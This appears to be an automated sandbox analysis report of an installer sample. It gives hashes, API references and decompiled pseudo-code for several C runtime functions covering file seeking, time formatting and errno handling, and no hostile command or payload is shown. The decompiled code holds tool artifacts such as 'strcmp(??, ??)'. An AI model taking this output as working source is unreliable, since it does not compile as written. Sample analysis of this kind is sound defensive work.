memmove.MSVCRT ref: 0048326D
memmove.MSVCRT ref: 004832A3
memcpy.MSVCRT ref: 004832EE

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: memmove$memcpy
String ID:
API String ID: 3033661859-0
Opcode ID: 6a29edc5480ac33f5cb7fb31a4513259ec8c5fa482bcbc593287688762fda841
Instruction ID: b10feea5904573679c3c763e9b04802386e07c8e878bc200aa4fc42f4d85380a
Opcode Fuzzy Hash: 6a29edc5480ac33f5cb7fb31a4513259ec8c5fa482bcbc593287688762fda841
Instruction Fuzzy Hash: 058128746083958FC301EF68C58042EFBE1BF89B45F148D5EE8C997311D678DA85DB8A

Uniqueness

Uniqueness Score: -1.00%

Function 004120E0, Relevance: 9.2, APIs: 6, Instructions: 221
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E004120E0(signed int __eax, signed int __edx, signed int _a4) {
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				signed int _v68;
				signed int _v72;
				signed int _t113;
				intOrPtr* _t116;
				intOrPtr _t117;
				intOrPtr _t122;
				signed int _t123;
				intOrPtr _t128;
				signed int _t129;
				signed int _t131;
				char* _t133;
				signed int _t135;
				void* _t139;
				void* _t140;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				char* _t146;
				signed int _t147;
				signed int _t150;
				signed int _t152;
				signed int _t154;
				intOrPtr _t158;
				intOrPtr _t159;
				signed int _t163;
				signed int _t171;
				signed int _t174;
				void* _t179;
				signed int _t181;
				void* _t184;
				signed int _t186;
				signed int _t193;
				signed int _t197;
				signed int _t198;
				signed int* _t199;

				_t150 = __edx;
				_t199 =  &_v60;
				_t135 = _a4;
				L0041B5C8();
				 *((intOrPtr*)(__eax)) = 0;
				 *_t199 = _t135;
				L0041B5B0();
				_t197 = __eax;
				_t113 =  *((intOrPtr*)(_t135 + 4));
				if(_t113 < 0) {
					 *((intOrPtr*)(_t135 + 4)) = 0;
				}
				_v64 = 1;
				_v72 = 0;
				_v68 = 0;
				 *_t199 = _t197;
				L0041B598();
				_v60 = _t113;
				_v56 = _t150;
				if(_t150 < 0) {
					_v60 = 0xffffffff;
					_v56 = 0xffffffff;
					goto L19;
				} else {
					_t152 =  *(_t135 + 0xc);
					if((_t152 & 0x00000108) == 0) {
						asm("cdq");
						_v60 = _v60 -  *((intOrPtr*)(_t135 + 4));
						asm("sbb [esp+0x14], edx");
						goto L19;
					} else {
						_t140 =  *_t135;
						_t116 =  *((intOrPtr*)(_t135 + 8));
						_v36 = _t116;
						_v52 = _t140 - _t116;
						if((_t152 & 0x00000003) != 0) {
							_t117 =  *0x4e7370; // 0x74d36c60
							_t184 = ((_t197 & 0x0000001f) + (_t197 & 0x0000001f) * 4 << 3) +  *((intOrPtr*)(_t117 + (_t197 >> 5) * 4));
							_t171 = _v52;
							__eflags =  *((char*)(_t184 + 4));
							_v40 = _t171;
							if( *((char*)(_t184 + 4)) < 0) {
								_t133 = _v36;
								__eflags = _t140 - _t133;
								if(_t140 <= _t133) {
									goto L6;
								} else {
									_a4 = _t135;
									_t181 = _t152;
									_t139 = _t140;
									_t163 = _t171;
									do {
										__eflags =  *_t133 - 0xa;
										_t133 = _t133 + 1;
										_t163 = _t163 + (0 | __eflags == 0x00000000);
										__eflags = _t139 - _t133;
									} while (_t139 != _t133);
									_v40 = _t163;
									_t135 = _a4;
									_t152 = _t181;
								}
							}
							goto L7;
						} else {
							if((_t152 & 0x00000080) == 0) {
								L0041B5C8();
								_v60 = 0xffffffff;
								 *_t116 = 0x16;
								_v56 = 0xffffffff;
								goto L19;
							} else {
								L6:
								_v40 = _v52;
								L7:
								if((_v56 | _v60) == 0) {
									_v56 = 0;
									_v60 = _v40;
									return _v60;
								} else {
									_t154 = _t152 & 0x00000001;
									if(_t154 == 0) {
										_t66 =  &_v60;
										 *_t66 = _v60 + _v40;
										__eflags =  *_t66;
										asm("adc [esp+0x14], edx");
										return _v60;
									} else {
										_t122 =  *((intOrPtr*)(_t135 + 4));
										if(_t122 != 0) {
											_t123 = _t122 + _v52;
											_v48 = 0;
											_t174 = _t197 >> 5;
											_v32 = _t174;
											_t186 = _t123;
											_v36 = _t123;
											_t143 = ((_t197 & 0x0000001f) + (_t197 & 0x0000001f) * 4) * 8;
											_v52 = _v40;
											_t128 =  *0x4e7370; // 0x74d36c60
											_t129 =  *(_t128 + _t174 * 4);
											if( *((char*)(_t129 + _t143 + 4)) < 0) {
												_v64 = 2;
												_v72 = 0;
												_v68 = 0;
												 *_t199 = _t197;
												_v40 = _t143;
												L0041B598();
												_t144 = _v40;
												__eflags = _v56 ^ _t154 | _v60 ^ _t129;
												if((_v56 ^ _t154 | _v60 ^ _t129) != 0) {
													_v64 = 0;
													 *_t199 = _t197;
													_v40 = _t144;
													_v72 = _v60;
													_v68 = _v56;
													L0041B598();
													__eflags = _v36 - 0x200;
													_t145 = _v40;
													if(_v36 > 0x200) {
														L33:
														_t131 =  *((intOrPtr*)(_t135 + 0x18));
													} else {
														_t131 = 0x200;
														__eflags = ( *(_t135 + 0xc) & 0x00000408) - 8;
														if(( *(_t135 + 0xc) & 0x00000408) != 8) {
															goto L33;
														}
													}
													_t158 =  *0x4e7370; // 0x74d36c60
													_t159 =  *((intOrPtr*)(_t158 + _v32 * 4));
													__eflags =  *(_t159 + _t145 + 4) & 0x00000004;
													if(( *(_t159 + _t145 + 4) & 0x00000004) != 0) {
														_t131 = _t131 + 1;
													}
													goto L12;
												} else {
													_t146 =  *((intOrPtr*)(_t135 + 8));
													_t193 = _v36;
													_t179 = _t146 + _t193;
													__eflags = _t146 - _t179;
													if(_t146 < _t179) {
														_t198 = _t135;
														do {
															__eflags =  *_t146 - 0xa;
															_t146 = _t146 + 1;
															_t193 = _t193 + (0 | __eflags == 0x00000000);
															__eflags = _t179 - _t146;
														} while (_t179 != _t146);
														_v36 = _t193;
														_t135 = _t198;
													}
													__eflags =  *(_t135 + 0xd) & 0x00000020;
													_t147 = _v36;
													if(( *(_t135 + 0xd) & 0x00000020) != 0) {
														_t147 = _t147 + 1;
														__eflags = _t147;
													}
													asm("sbb edx, ebx");
													asm("adc edi, edx");
													_v60 = _v52 + _t129 - _t147;
													_v56 = _v48;
												}
											} else {
												_t131 = _t186;
												L12:
												asm("sbb edi, edx");
												asm("adc edi, [esp+0x1c]");
												_v60 = _v60 - _t131 + _v52;
											}
										}
										L19:
										return _v60;
									}
								}
							}
						}
					}
				}
			}

0x004120e0
0x004120e4
0x004120e7
0x004120eb
0x004120f0
0x004120f6
0x004120f9
0x004120fe
0x00412100
0x00412105
0x00412107
0x00412107
0x0041210e
0x00412116
0x0041211e
0x00412126
0x00412129
0x00412130
0x00412134
0x00412138
0x00412363
0x0041236b
0x00000000
0x0041213e
0x0041213e
0x00412147
0x00412273
0x00412274
0x00412278
0x00000000
0x0041214d
0x0041214d
0x0041214f
0x00412154
0x0041215d
0x00412161
0x00412207
0x0041221d
0x0041221f
0x00412223
0x00412227
0x0041222b
0x00412231
0x00412235
0x00412237
0x00000000
0x0041223d
0x0041223f
0x00412243
0x00412245
0x00412247
0x00412250
0x00412252
0x00412258
0x0041225b
0x0041225d
0x0041225d
0x00412261
0x00412265
0x00412269
0x00412269
0x00412237
0x00000000
0x00412167
0x0041216a
0x004123e0
0x004123e5
0x004123ed
0x004123f3
0x00000000
0x00412170
0x00412170
0x00412174
0x00412178
0x00412184
0x00412294
0x004122a0
0x004122af
0x0041218a
0x0041218a
0x0041218d
0x004122b6
0x004122b6
0x004122b6
0x004122ba
0x004122cd
0x00412193
0x00412193
0x00412198
0x0041219e
0x004121a4
0x004121ac
0x004121af
0x004121b3
0x004121b5
0x004121c1
0x004121cc
0x004121d0
0x004121d5
0x004121dd
0x004122d0
0x004122d8
0x004122e0
0x004122e8
0x004122eb
0x004122ef
0x004122fc
0x00412304
0x00412306
0x00412380
0x00412388
0x0041238b
0x0041238f
0x00412393
0x00412397
0x0041239c
0x004123a4
0x004123a8
0x004123bd
0x004123bd
0x004123aa
0x004123ad
0x004123b8
0x004123bb
0x00000000
0x00000000
0x004123bb
0x004123c0
0x004123ca
0x004123cd
0x004123d2
0x004123d8
0x004123d8
0x00000000
0x00412308
0x00412308
0x0041230b
0x0041230f
0x00412312
0x00412314
0x00412316
0x00412320
0x00412322
0x00412328
0x0041232b
0x0041232d
0x0041232d
0x00412331
0x00412335
0x00412335
0x00412337
0x0041233b
0x0041233f
0x00412341
0x00412341
0x00412341
0x00412350
0x00412354
0x00412356
0x0041235a
0x0041235a
0x004121e3
0x004121e3
0x004121e5
0x004121f1
0x004121f7
0x004121fb
0x004121ff
0x004121dd
0x0041227c
0x0041228b
0x0041228b
0x0041218d
0x00412184
0x0041216a
0x00412161
0x00412147

APIs

_errno.MSVCRT ref: 004120EB
_fileno.MSVCRT ref: 004120F9
_lseeki64.MSVCRT ref: 00412129

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: _errno_fileno_lseeki64
String ID:
API String ID: 1152433503-0
Opcode ID: d0eecaf758094ade9b6749b25de96d29f4140b01077452e7e0cf25412821b1ed
Instruction ID: 0e08408a35641cd692a2015673c502b74a2c24ed6cb1af6c73eac128485b4ef6
Opcode Fuzzy Hash: d0eecaf758094ade9b6749b25de96d29f4140b01077452e7e0cf25412821b1ed
Instruction Fuzzy Hash: E8916D716083018FC700CF28C58074BBBE1BFC8364F198A5EE8989B351D3B9E949CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00412030, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

fsetpos.MSVCRT ref: 00412068
fgetpos.MSVCRT ref: 00412080
fflush.MSVCRT ref: 0041209A
_fileno.MSVCRT ref: 004120A2
_filelengthi64.MSVCRT ref: 004120AA
_errno.MSVCRT ref: 004120C4

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: _errno_filelengthi64_filenofflushfgetposfsetpos
String ID:
API String ID: 4183758535-0
Opcode ID: 3a8db24a24652df49a7dd3926f6c8e15cf24a093d281d193550af0be8360b953
Instruction ID: 7bd2fe4126718f331e473fdc33e104c1b7acf8f73448c699bfd941fe9f9440d1
Opcode Fuzzy Hash: 3a8db24a24652df49a7dd3926f6c8e15cf24a093d281d193550af0be8360b953
Instruction Fuzzy Hash: 8E112BB18083059BC310AF26858009FBFE6EED9368F154A1FE99483351E77999D8CB97

Uniqueness

Uniqueness Score: -1.00%

Function 004225C0, Relevance: 9.0, APIs: 6, Instructions: 50stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 004225D8
strlen.MSVCRT ref: 004225E2
memcpy.MSVCRT ref: 004225FF
setlocale.MSVCRT ref: 00422612
wcsftime.MSVCRT ref: 00422636
setlocale.MSVCRT ref: 00422648

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: setlocale$memcpystrlenwcsftime
String ID:
API String ID: 3412479102-0
Opcode ID: 909db1fabb43f5c9be1f7b6b1555da68ebd7a9ad047d90ae944b3f55aaf05498
Instruction ID: cc567bb65a5b097995ebdf63c5bd99fc0af9b2fd629b9ec7569efc2709f7a0cf
Opcode Fuzzy Hash: 909db1fabb43f5c9be1f7b6b1555da68ebd7a9ad047d90ae944b3f55aaf05498
Instruction Fuzzy Hash: FA1196B05193049FD740EF6AC58565FBBE4EF88754F41882EF4C887312E77898908B96

Uniqueness

Uniqueness Score: -1.00%

Function 00422320, Relevance: 9.0, APIs: 6, Instructions: 49stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 00422338
strlen.MSVCRT ref: 00422342
memcpy.MSVCRT ref: 0042235F
setlocale.MSVCRT ref: 00422372
strftime.MSVCRT ref: 00422396
setlocale.MSVCRT ref: 004223A8

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: setlocale$memcpystrftimestrlen
String ID:
API String ID: 1843691881-0
Opcode ID: 8958f81cea89248f969fcdc76b81ee56554ec0c4217415062cf4d211d616170b
Instruction ID: a2d28f4682d4e38bfb78e1615dd6d8dbfe48005a25e214372f9fb2f3816d066b
Opcode Fuzzy Hash: 8958f81cea89248f969fcdc76b81ee56554ec0c4217415062cf4d211d616170b
Instruction Fuzzy Hash: 591196B45093449FD740AF69C58575FBBE4EF88758F41882EF4C887312E77898908B96

Uniqueness

Uniqueness Score: -1.00%

Function 00464B20, Relevance: 9.0, APIs: 6, Instructions: 45COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00464B3D
_errno.MSVCRT ref: 00464B41
_errno.MSVCRT ref: 00464B50
fflush.MSVCRT ref: 00464B5A
_errno.MSVCRT ref: 00464B63

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: _errno$fflush
String ID:
API String ID: 3480992530-0
Opcode ID: bb556082b234f8595106bf2d0df1584cacc34e1d4a12d19a62f2c719c5486f92
Instruction ID: ee021b0ba0ab57f118795cca3d9e750b2f233deb2a6c9525aeba388001415808
Opcode Fuzzy Hash: bb556082b234f8595106bf2d0df1584cacc34e1d4a12d19a62f2c719c5486f92
Instruction Fuzzy Hash: DDF031726052148FDB117F6AEC40716F79CEFE2B64F0600ABD9048B221E675A8159AA6

Uniqueness

Uniqueness Score: -1.00%

Function 0044A0E0, Relevance: 7.8, APIs: 3, Strings: 2, Instructions: 315COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0044A211
memchr.MSVCRT ref: 0044A235

Part of subcall function 00490A90: setlocale.MSVCRT ref: 00490AAA

Strings

-, xrefs: 0044A41A
., xrefs: 0044A22A

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: -$.
API String ID: 4291329590-3807043784
Opcode ID: a6273e780523b5b89a67e52274c9920c674eefffb10d3a356efd460039ba5142
Instruction ID: 19de02fd44618d5931e4bfedf1b933baa0674e238ce9fb882cae2a8326c6b881
Opcode Fuzzy Hash: a6273e780523b5b89a67e52274c9920c674eefffb10d3a356efd460039ba5142
Instruction Fuzzy Hash: DBD115B0D043199FDB00EFA9C48499EBBF1BF88304F048A6EE894A7355D778D955CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0044A550, Relevance: 7.8, APIs: 3, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 0044A67B
memchr.MSVCRT ref: 0044A69F

Part of subcall function 00490A90: setlocale.MSVCRT ref: 00490AAA

Strings

., xrefs: 0044A694
6, xrefs: 0044A88A

Memory Dump Source

Source File: 00000007.00000002.304000935.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.303997911.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304077955.000000000049F000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304082819.00000000004A1000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304091149.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304129679.00000000004E6000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.304134557.00000000004EA000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304152406.000000000050D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.304163755.000000000051B000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_setup_install.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: .$6
API String ID: 4291329590-4089497287
Opcode ID: b875cd7a6913787a42f3e88962db1495465289438cb7f84da3d36ee614c0d791
Instruction ID: 7d15e399f42668dd51a64a0b31e3b044cfd6e4c879687f7ac108879eedf49c34
Opcode Fuzzy Hash: b875cd7a6913787a42f3e88962db1495465289438cb7f84da3d36ee614c0d791
Instruction Fuzzy Hash: BBD147B19083599FDB00DFA9C48099EBBF1BF88304F058A2EE894A7351D738D955CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00405815, Relevance: 7.8, APIs: 3, Strings: 2, Instructions: 250
stringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00405815(signed char* __ebx) {
				signed char* _t161;
				signed int _t162;
				signed char _t169;
				signed char* _t174;
				intOrPtr* _t185;
				int _t188;
				intOrPtr* _t199;
				intOrPtr _t200;
				signed char* _t220;
				signed int _t224;
				intOrPtr* _t226;
				signed char _t235;
				signed char** _t239;
				signed char _t254;
				signed char* _t258;
				intOrPtr _t259;
				signed char* _t263;
				intOrPtr _t264;
				void* _t267;
				signed char** _t269;

				_t220 = __ebx;
				_t222 =  *((intOrPtr*)(_t267 + 8));
				_t161 =  *( *( *((intOrPtr*)(_t267 + 8)) + 8));
				if(_t161[1] == 0x63) {
					_t162 =  *_t161 & 0x000000ff;
					if(_t162 - 0x63 <= 1 || _t162 - 0x72 <= 1) {
						E0040B3C0(_t220, _t222, _t269[6]);
						if(_t220[0x100] == 0xff) {
							_t220[0xff] = 0;
							_t269[1] = 0xff;
							_t269[2] = _t220[0x10c];
							 *_t269 = _t220;
							_t220[0x108]();
							_t220[0x128] = _t220[0x128] + 1;
							_t220[0x100] = 0;
						}
						_t165 = _t220[0x100];
						_t263 = ">(";
						_t66 = _t165 + 1; // 0x1
						_t220[0x100] = _t66;
						_t220[_t220[0x100]] = 0x3c;
						_t220[0x104] = 0x3c;
						E00405780(_t220,  *((intOrPtr*)( *(_t267 + 0xc) + 8)), _t269[6]);
						_t235 = _t220[0x100];
						do {
							_t224 =  *_t263 & 0x000000ff;
							_t169 = _t235;
							if(_t235 == 0xff) {
								_t220[0xff] = 0;
								_t269[7] = _t224;
								_t269[2] = _t220[0x10c];
								_t269[1] = 0xff;
								 *_t269 = _t220;
								_t220[0x108]();
								_t220[0x128] = _t220[0x128] + 1;
								_t224 = _t269[7] & 0x000000ff;
								_t169 = 0;
							}
							_t83 = _t169 + 1; // 0x1
							_t235 = _t83;
							_t263 =  &(_t263[1]);
							_t220[0x100] = _t235;
							_t220[_t169] = _t224;
							_t220[0x104] = _t224;
						} while (0x4a32d0 != _t263);
						E00405780(_t220,  *((intOrPtr*)( *(_t267 + 0xc) + 0xc)), _t269[6]);
						if(_t220[0x100] == 0xff) {
							_t220[0xff] = 0;
							_t269[1] = 0xff;
							_t269[2] = _t220[0x10c];
							 *_t269 = _t220;
							_t220[0x108]();
							_t220[0x128] = _t220[0x128] + 1;
							_t220[0x100] = 0;
						}
						_t100 = _t220[0x100] + 1; // 0x1
						_t220[0x100] = _t100;
						_t220[_t220[0x100]] = 0x29;
						_t174 = _t269[0xd];
						_t220[0x104] = 0x29;
						_t106 =  *((intOrPtr*)(_t267 + 4)) - 1; // 0xfe
						_t264 = _t106;
						_t254 = _t220[0x11c] - 1;
						L14:
						_t220[0x12c] = _t174;
						 *((intOrPtr*)(_t267 + 4)) = _t264;
						_t220[0x11c] = _t254;
						return _t174;
					} else {
						goto L1;
					}
				}
				L1:
				 *_t269 = _t267 + 0xc;
				if(E0040B550(_t220, _t222, _t269[6]) != 0) {
					_t174 = _t269[0xd];
					_t264 =  *((intOrPtr*)(_t267 + 4)) - 1;
					_t254 = _t220[0x11c] - 1;
					goto L14;
				}
				_t185 =  *((intOrPtr*)(_t267 + 8));
				if( *_t185 == 0x31) {
					_t239 =  *(_t185 + 8);
					if(_t239[2] == 1 &&  *(_t239[1]) == 0x3e) {
						if(_t220[0x100] == 0xff) {
							_t220[0xff] = 0;
							_t269[1] = 0xff;
							_t269[2] = _t220[0x10c];
							 *_t269 = _t220;
							_t220[0x108]();
							_t220[0x128] = _t220[0x128] + 1;
							_t220[0x100] = 0;
						}
						_t129 = _t220[0x100] + 1; // 0x1
						_t220[0x100] = _t129;
						_t220[_t220[0x100]] = 0x28;
						_t220[0x104] = 0x28;
						_t185 =  *((intOrPtr*)(_t267 + 8));
					}
				}
				_t269[1] = 0x4a2d36;
				 *_t269 =  *( *(_t185 + 8));
				_t188 = strcmp(??, ??);
				_t226 =  *((intOrPtr*)( *(_t267 + 0xc) + 8));
				if(_t188 != 0 ||  *_t226 != 3) {
					E0040B460(_t220, _t226, _t269[6]);
				} else {
					if( *((intOrPtr*)( *((intOrPtr*)(_t226 + 0xc)))) != 0x29) {
						_t220[0x118] = 1;
					}
					E0040B460(_t220,  *((intOrPtr*)(_t226 + 8)), _t269[6]);
				}
				_t266 =  *((intOrPtr*)(_t267 + 8));
				_t258 =  *( *( *((intOrPtr*)(_t267 + 8)) + 8));
				_t269[1] = "ix";
				 *_t269 = _t258;
				if(strcmp(??, ??) != 0) {
					_t269[1] = 0x4a2d36;
					 *_t269 = _t258;
					if(strcmp(??, ??) != 0) {
						E0040B3C0(_t220, _t266, _t269[6]);
					}
					E0040B460(_t220,  *((intOrPtr*)( *(_t267 + 0xc) + 0xc)), _t269[6]);
				} else {
					if(_t220[0x100] == 0xff) {
						_t220[0xff] = 0;
						_t269[1] = 0xff;
						_t269[2] = _t220[0x10c];
						 *_t269 = _t220;
						_t220[0x108]();
						_t220[0x128] = _t220[0x128] + 1;
						_t220[0x100] = 0;
					}
					_t25 = _t220[0x100] + 1; // 0x1
					_t220[0x100] = _t25;
					_t220[_t220[0x100]] = 0x5b;
					_t220[0x104] = 0x5b;
					E00405780(_t220,  *((intOrPtr*)( *(_t267 + 0xc) + 0xc)), _t269[6]);
					if(_t220[0x100] == 0xff) {
						_t220[0xff] = 0;
						_t269[1] = 0xff;
						_t269[2] = _t220[0x10c];
						 *_t269 = _t220;
						_t220[0x108]();
						_t220[0x128] = _t220[0x128] + 1;
						_t220[0x100] = 0;
					}
					_t42 = _t220[0x100] + 1; // 0x1
					_t220[0x100] = _t42;
					_t220[_t220[0x100]] = 0x5d;
					_t220[0x104] = 0x5d;
				}
				_t199 =  *((intOrPtr*)(_t267 + 8));
				if( *_t199 == 0x31) {
					_t200 =  *((intOrPtr*)(_t199 + 8));
					if( *((intOrPtr*)(_t200 + 8)) != 1 ||  *((char*)( *((intOrPtr*)(_t200 + 4)))) != 0x3e) {
						goto L13;
					} else {
						if(_t220[0x100] == 0xff) {
							_t220[0xff] = 0;
							_t269[1] = 0xff;
							_t269[2] = _t220[0x10c];
							 *_t269 = _t220;
							_t220[0x108]();
							_t220[0x128] = _t220[0x128] + 1;
							_t220[0x100] = 0;
						}
						_t147 = _t220[0x100] + 1; // 0x1
						_t220[0x100] = _t147;
						_t220[_t220[0x100]] = 0x29;
						_t174 = _t269[0xd];
						_t220[0x104] = 0x29;
						_t153 =  *((intOrPtr*)(_t267 + 4)) - 1; // 0xfe
						_t264 = _t153;
						_t254 = _t220[0x11c] - 1;
						goto L14;
					}
				} else {
					L13:
					_t259 =  *((intOrPtr*)(_t267 + 4));
					_t174 = _t269[0xd];
					_t49 = _t259 - 1; // 0xfe
					_t264 = _t49;
					_t254 = _t220[0x11c] - 1;
					goto L14;
				}
			}

0x00405815
0x00405815
0x0040581b
0x00405821
0x00409468
0x00409471
0x00409484
0x00409493
0x0040949b
0x004094a2
0x004094aa
0x004094ae
0x004094b1
0x004094b7
0x004094be
0x004094be
0x004094c8
0x004094ce
0x004094d8
0x004094db
0x004094e5
0x004094e9
0x004094f8
0x004094fd
0x00409503
0x00409503
0x00409506
0x0040950e
0x00409516
0x0040951d
0x00409521
0x00409525
0x0040952d
0x00409530
0x00409536
0x0040953d
0x00409542
0x00409542
0x00409544
0x00409544
0x00409547
0x0040954a
0x00409550
0x00409553
0x00409559
0x00409569
0x00409578
0x00409580
0x00409587
0x0040958f
0x00409593
0x00409596
0x0040959c
0x004095a3
0x004095a3
0x004095b3
0x004095b6
0x004095bc
0x004095c0
0x004095c4
0x004095ce
0x004095ce
0x004095d7
0x00405981
0x00405981
0x00405987
0x0040598a
0x0040599a
0x00000000
0x00000000
0x00000000
0x00409471
0x00405827
0x0040582e
0x0040583a
0x004096e2
0x004096e6
0x004096ef
0x00000000
0x004096ef
0x00405840
0x00405846
0x00409843
0x0040984a
0x00409866
0x0040986e
0x00409875
0x0040987d
0x00409881
0x00409884
0x0040988a
0x00409891
0x00409891
0x004098a1
0x004098a4
0x004098aa
0x004098ae
0x004098b5
0x004098b5
